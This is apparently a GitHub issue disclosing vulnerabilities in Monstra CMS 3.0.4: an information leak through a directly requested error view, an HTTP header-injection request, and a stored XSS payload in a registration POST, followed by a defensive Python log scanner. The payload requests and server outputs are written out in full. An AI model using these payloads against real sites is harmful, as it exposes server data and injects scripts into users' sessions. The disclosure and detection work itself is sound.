Monstra CMS V3.0.4 allows attackers to obtain sensitive information #4

howchen opened this issue Sep 7, 2018 · 0 comments
howchen commented Sep 7, 2018

Part 1: sensitive information leakage

Request:
http://site.com/monstra-master/libraries/Gelato/ErrorHandler/Resources/Views/Errors/exception.php

The response error message contains sensitive information:

Variable | Value
-- | --
PATH | string(955) "C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;D:\install\jdk1.8\bin;D:\install\apache-maven-3.5.3\bin;D:\install\gradle-4.4\bin;D:\install\apache-ant-1.10.4\bin;C:\Python27;C:\Program Files\dotnet\;C:\Program Files\Microsoft SQL Server\130\Tools\Binn\;C:\Program Files\Git\bin;D:\tools\sqlmapproject-sqlmap-a831865;C:\Users\c00450407\AppData\Local\Programs\Python\Python37-32\Scripts\;C:\Users\c00450407\AppData\Local\Programs\Python\Python37-32\;C:\Users\c00450407\AppData\Local\Microsoft\WindowsApps;C:\Users\c00450407\AppData\Local\Programs\Fiddler"
SystemRoot | string(10) "C:\Windows"
COMSPEC | string(27) "C:\Windows\system32\cmd.exe"
PATHEXT | string(53) ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC"
WINDIR | string(10) "C:\Windows"
SERVER_SIGNATURE | string(0) ""
SERVER_SOFTWARE | string(47) "Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45"
SERVER_NAME | string(9) "localhost"
SERVER_ADDR | string(9) "127.0.0.1"
SERVER_PORT | string(4) "8899"
REMOTE_ADDR | string(9) "127.0.0.1"
DOCUMENT_ROOT | string(35) "D:/install/phpstudy/PHPTutorial/WWW"
REQUEST_SCHEME | string(4) "http"
CONTEXT_PREFIX | string(0) ""
CONTEXT_DOCUMENT_ROOT | string(35) "D:/install/phpstudy/PHPTutorial/WWW"
SERVER_ADMIN | string(12) "admin@php.cn"
SCRIPT_FILENAME | string(117) "D:/install/phpstudy/PHPTutorial/WWW/monstra-master/libraries/Gelato/ErrorHandler/Resources/Views/Errors/exception.php"

Part 2: HTTP header injection

Request:
/monstra-master/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20mycookie=hell

HTTP/1.1 200 OK
Date: Fri, 07 Sep 2018 06:50:53 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cryptcookietest=1
Content-Length: 215
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Warning</b>:  Header may not contain more than a single header, new line detected in <b>D:\install\phpstudy\PHPTutorial\WWW\monstra-master\plugins\captcha\crypt\cryptographp.php</b> on line <b>5</b><br />

Part 3: XSS

Request (POST):

POST /monstra-master/users/registration HTTP/1.1
Host: localhost:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 391
Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; finecms-admin-login=admin; PHPSESSID=f24ec5cd673j71ttpd5nllp2i2
Connection: close
Upgrade-Insecure-Requests: 1

csrf=c9948680570e923cc610543c9c08ed2ed088ad9c&login=test3&password="><script>alert('1')</script>&email=test3%40163.com&answer=EATT&register=Register
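An added example, not part of the issue report or of the Monstra code: a small Python scanner that reads Apache access-log lines and flags the two traits of parts 1 and 2 that a server operator can see in logs, direct requests to the Gelato error view and a percent-encoded CR/LF inside a query parameter (the precondition for the header() warning shown above). The log lines are constructed from the requests quoted in the report; the XSS POST body of part 3 does not appear in access logs, so it is out of scope here.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Constructed Common Log Format lines modelled on the requests in the report.
SAMPLE_LOG = """\
127.0.0.1 - - [07/Sep/2018:06:50:10 +0000] "GET /monstra-master/libraries/Gelato/ErrorHandler/Resources/Views/Errors/exception.php HTTP/1.1" 200 4120
127.0.0.1 - - [07/Sep/2018:06:50:53 +0000] "GET /monstra-master/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20mycookie=hell HTTP/1.1" 200 215
127.0.0.1 - - [07/Sep/2018:06:51:02 +0000] "GET /monstra-master/plugins/captcha/crypt/cryptographp.php?cfg=1 HTTP/1.1" 200 1890
127.0.0.1 - - [07/Sep/2018:06:51:20 +0000] "POST /monstra-master/users/registration HTTP/1.1" 302 0
"""

# Only the request target (path + query) is needed from each log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Framework-internal view templates that should never be requested directly
# (assumed prefix list; extend it for the deployment's own install path).
INTERNAL_VIEW_PREFIXES = ("/monstra-master/libraries/Gelato/ErrorHandler/Resources/Views/",)


def findings_for_request(target: str) -> List[str]:
    """Return the suspicious traits of one request target, empty if clean."""
    found = []
    parts = urlsplit(target)
    if parts.path.startswith(INTERNAL_VIEW_PREFIXES):
        found.append("direct-access-to-error-view")
    # parse_qsl percent-decodes once, so %0D%0A becomes a literal CR LF; a
    # value like that reaching header() is what triggers the PHP warning.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if "\r" in value or "\n" in value:
            found.append(f"crlf-in-param:{name}")
    return found


def scan_log(text: str) -> Dict[str, List[str]]:
    """Map each flagged request target to its findings; clean lines are skipped."""
    report = {}
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match is None:
            continue
        hits = findings_for_request(match["target"])
        if hits:
            report[match["target"]] = hits
    return report


if __name__ == "__main__":
    for target, hits in scan_log(SAMPLE_LOG).items():
        print(target, "->", ", ".join(hits))
```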